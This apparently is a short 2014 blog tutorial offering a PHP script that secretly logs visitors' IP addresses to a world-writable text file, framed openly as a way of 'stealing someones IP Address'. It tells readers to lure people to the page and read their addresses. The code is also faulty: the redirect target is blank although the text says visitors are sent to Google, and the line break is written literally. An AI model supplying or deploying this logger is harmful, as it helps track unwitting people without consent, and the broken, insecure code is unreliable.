How to Hack Someones IP Address

by Saturday, January 18, 2014 0 comments

Alright, I'm gonna give you this script, that you write in the index. php . It will redirect them to, but you can change that in the script.

Here is the sript:


$file = 'IPz.txt';
$handle = fopen($file,'a');
if(!isset($_GET['p'])) { header('Location:'); }
fwrite($handle, $_GET['p'].': '.$_SERVER['REMOTE_ADDR'].'\r\n');

1. First of all you need to make a new .txt document on the website you're uploading this to. Call it IPz.txt (You can change that in the script aswell where it says $file = 'IPz.txt'; in the second line. Then change the CHMOD to 777.

2. Now you need to past the script above in to a .php document, and upload it.

3. Now you make people visit your site, and they will get redirected to Google.

4. To view the IP, you simply add "/IPz.txt" after your domain, and you'll see the IP.

This is a very simple, but effectually method for stealing someones IP Address.
Hope you'll find this tutorial useful. 



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